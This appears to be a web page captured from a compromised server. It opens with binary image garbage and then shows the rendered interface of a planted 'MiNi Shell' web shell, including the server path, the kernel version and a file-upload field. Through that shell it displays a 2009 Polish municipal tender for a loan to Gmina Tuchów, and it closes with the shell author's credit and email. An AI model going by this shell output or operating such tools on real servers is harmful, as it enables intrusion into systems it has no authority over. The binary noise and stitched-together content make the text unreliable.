JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090806/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090806/128187-N-2009.html

<p class="kh_header"><b>Tuchów: Udzielenie kredytu długoterminowego złotowego z przeznaczeniem na pokrycie planowanego deficytu budżetu na rok 2009 i na spłatę wcześniej zaciągniętych pożyczek i kredytów w wysokości 2 528 000 PLN (słownie: dwa miliony pięćset dwadzieścia osiem tysięcy złotych)</b><br>
<b>Numer ogłoszenia: 128187 - 2009; data zamieszczenia: 06.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchów , ul. Rynek 1, 33-170 Tuchów, woj. małopolskie, tel. 0146525218 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuchow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> /www.wrotamalopolski.pl/root_BIP/BIP_w_Malopolsce/gminy/root_Tuchow/podmiotowe/Zamowienia+publiczne/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie kredytu długoterminowego złotowego z przeznaczeniem na pokrycie planowanego deficytu budżetu na rok 2009 i na spłatę wcześniej zaciągniętych pożyczek i kredytów w wysokości 2 528 000 PLN (słownie: dwa miliony pięćset dwadzieścia osiem tysięcy złotych).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Udzielenie kredytu długoterminowego złotowego z przeznaczeniem na pokrycie planowanego deficytu budżetu na rok 2009 i na spłatę wcześniej zaciągniętych pożyczek i kredytów w wysokości 2 528 000 PLN (słownie: dwa miliony pięćset dwadzieścia osiem tysięcy złotych)
I.   Łączna kwota kredytu 2 528 000 PL
II.  Okres kredytowania: wrzesień 2009 do wrzesień 2014 rok.
III. Spłata kapitału w ratach, zgodnie z poniższym zestawieniem:
- 1   rata   31-01-2010    20 000,00 zł
- 2   rata   30-04-2010    20 000,00 zł
- 3   rata   31-07-2010    20 000,00 zł
- 4   rata   31-10-2010    20 000,00 zł
- 5   rata   31-01-2011    50 000,00 zł
- 6   rata   30-04-2011    50 000,00 zł
- 7   rata   31-07-2011    50 000,00 zł
- 8   rata   31-10-2011    50 000,00 zł
- 9   rata   29-02-2012   125 000,00 zł
- 10 rata   30-04-2012    125 000,00 zł
- 11 rata   31-07-2012    125 000,00 zł
- 12 rata   31-10-2012    125 000,00 zł
- 13 rata   28-02-2013    100 000,00 zł
- 14 rata   31-03-2013    100 000,00 zł
- 15 rata   30-04-2013    100 000,00 zł
- 16 rata   30-06-2013    100 000,00 zł
- 17 rata   31-07-2013    100 000,00 zł
- 18 rata   31-08-2013    100 000,00 zł
- 19 rata   30-09-2013    100 000,00 zł
- 20 rata   31-10-2013    100 000,00 zł
- 21 rata   30-11-2013    100 000,00 zł
- 22 rata   31-01-2014    120 000,00 zł
- 23 rata   31-03-2014    120 000,00 zł
- 24 rata   30-04-2014    120 000,00 zł
- 25 rata   30-06-2014    120 000,00 zł
- 26 rata   31-07-2014    120 000,00 zł
- 27 rata   31-08-2014    120 000,00 zł
- 28 rata   30-09-2014    120 000,00 zł
   
IV.  Rata odsetkowa płatna w okresach kwartalnych - przy czym, pierwsza rata   przypada na dzień 30.09.2009 r. 
V.   Zabezpieczenie: weksel in blanco wraz z deklaracją wekslową.
VI.  Uruchomienie kredytu: od dnia podpisania umowy wg zleceń płatniczych, w miarę zaistnienia potrzeb płatniczych, do dnia  20. 12. 2009 r.
VII. Kredyt lub transze kredytu, zostaną przekazane na rachunek zamawiającego (podstawowy budżetu Gminy)  prowadzony przez Bank Spółdzielczy w Bieczu o numerze: 04 8627 0001 2023 9000 2658 0001.
VII. Od przyznanego kredytu Wykonawca nie pobierze prowizji od przyznanego kredytu, od wcześniejszej spłaty kredytu oraz innych stosowanych przez Bank prowizji związanych z obsługą kredytu i innych opłat.
VIII.Wykonawca nie będzie pobierał żadnej prowizji przygotowawczej.
IX. Oprocentowanie kredytu wyrażone będzie jako suma stawki WIBOR 3M i marży Banku przy czym WIBOR 3M będzie stawką zmienną dla każdego okresu odsetkowego. Zmiana oprocentowania dokonywana będzie w okresach kwartalnych w pierwszym dniu roboczym każdego kwartału kalendarzowego w oparciu o stawkę WIBOR 3M obowiązującą w ostatnim dniu roboczym poprzedniego kwartału kalendarzowego. Marża Banku będzie wielkością stałą wyrażoną w procentach w skali roku i będzie obowiązywała przez cały okres kredytowania.
X.  Termin wykonania zamówienia: od dnia podpisania umowy do dnia 30 września 2014 r..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.00.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, którzy:
1. Nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych
2. Spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, tzn. 
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawiają pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

Ocena spełnienia wymienionych warunków będzie dokonywana metodą 1-0, tj. spełnia lub nie spełnia, w oparciu o dokumenty i oświadczenia dołączone do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy ubiegający się o zamówienie publiczne winni złożyć następujące dokumenty:
1. Wypełniony druk OFERTA, który należy sporządzić ściśle wg wzoru druku załączonego przez Zamawiającego - Zał. Nr 1.
2. Oświadczenie o spełnieniu warunków udziału w postępowaniu w trybie art.22.ust.1. ustawy Prawo zamówień publicznych na formularzu stanowiącym załącznik nr 2 do niniejszej specyfikacji.
3. Oświadczenie o niepodleganiu wykluczeniu z postępowania w trybie art. 24. ustawy Prawo zamówień publicznych na formularzu stanowiącym załącznik nr 3 do  specyfikacji.
4. Zezwolenie komisji nadzoru bankowego lub inny dokument upoważniający do wykonywania czynności bankowych.
5. Harmonogram spłat rat kredytu i wysokość odsetek wg załącznika nr 4 do niniejszej specyfikacji.
Wyżej wymienione dokumenty należy przedstawić w formie oryginałów albo kserokopii. Dokumenty złożone w formie kserokopii muszą być opatrzone klauzulą ZA ZGODNOŚĆ Z ORYGINAŁEM wraz z datą i podpisane (wraz z pieczęciami imiennymi oraz pieczęcią firmową) przez osobę lub osoby uprawnione do podpisania oferty. 

W przypadku podmiotów występujących wspólnie do oferty należy dołączyć umowę regulującą współpracę tych podmiotów.

W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osobę(y) nie wymienione w dokumencie rejestracyjnym wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo.

Pełnomocnictwo może być przedłożone w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem.
Zamawiający przypomina, że dokument pełnomocnictwa, jak i jego odpis zgodnie z przepisami ustawy z dnia 16 listopada 2006 roku o opłacie skarbowej - podlegają opłacie skarbowej.
Załączniki do formularza ofertowego, będące częścią oferty, muszą być podpisane przez Wykonawców, bądź przez osoby upoważnione przez Wykonawcę (w tym przypadku upoważnienie do podpisania dokumentów musi być bezwzględnie dołączone do oferty).
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej, składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
nie otwarto jego likwidacji ani nie ogłoszono upadłości
nie orzeczono wobec niego zakazu ubiegania się o zamówienie
nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo nie uzyskał przewidzianego prawem zwolnienia, odroczenia lub rozłożenia na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty  należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem.
Dokumenty sporządzone w języku obcym, należy składać wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
Do ww. dokumentów Wykonawca może dołączyć wystąpienie do Zamawiającego o utajnienie informacji, które uważa za ważne dla swoich interesów handlowych i prawnych.
Przy braku wystąpienia do Zamawiającego o utajnienie informacji do każdego z załączonych dokumentów Zamawiający będzie uważał je za jawne..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.tuchow.pl/przetargi/BIP GMINY/zamówienia i ogłoszenia/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tuchowie, 33-170 Tuchów Rynek 1, pokój nr 1, także listownie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2009 godzina 09:00, miejsce: Urząd Miejski w Tuchowie, 33-170 Tuchów Rynek 1, pokój nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com